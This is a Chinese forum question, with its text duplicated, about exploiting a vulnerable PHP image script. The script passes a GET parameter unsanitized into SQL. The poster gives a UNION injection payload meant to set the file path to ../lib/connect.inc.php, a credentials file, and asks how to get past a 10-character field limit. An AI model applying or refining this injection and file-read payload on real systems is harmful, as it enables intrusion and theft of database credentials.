有一php文件如下
<?php
include_once("../lib/connect.inc.php");
mysql_web(1);
mysql_select_db("photo");
$file = $_GET['photo'];
$sql2="select picname from pic where sn=$file";
$ans2 = mysql_query($sql2);
$rec1=mysql_fetch_row( $ans2);
$f = "pic/".$rec1[0];
$image = fread( fopen( $f, 'r' ), filesize( $f ) );
echo $image;
?>
现想通过union控制$rec1[0],读取../lib/connect.inc.php,但是由于picname字段长度只有10,不足以存储../lib/connect.inc.php,问可有方式能解决?测试语句如:xx.php?photo=-1 union select '../lib/connect.inc.php' /*
谢谢!
<?php
include_once("../lib/connect.inc.php");
mysql_web(1);
mysql_select_db("photo");
$file = $_GET['photo'];
$sql2="select picname from pic where sn=$file";
$ans2 = mysql_query($sql2);
$rec1=mysql_fetch_row( $ans2);
$f = "pic/".$rec1[0];
$image = fread( fopen( $f, 'r' ), filesize( $f ) );
echo $image;
?>
现想通过union控制$rec1[0],读取../lib/connect.inc.php,但是由于picname字段长度只有10,不足以存储../lib/connect.inc.php,问可有方式能解决?测试语句如:xx.php?photo=-1 union select '../lib/connect.inc.php' /*
谢谢!
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货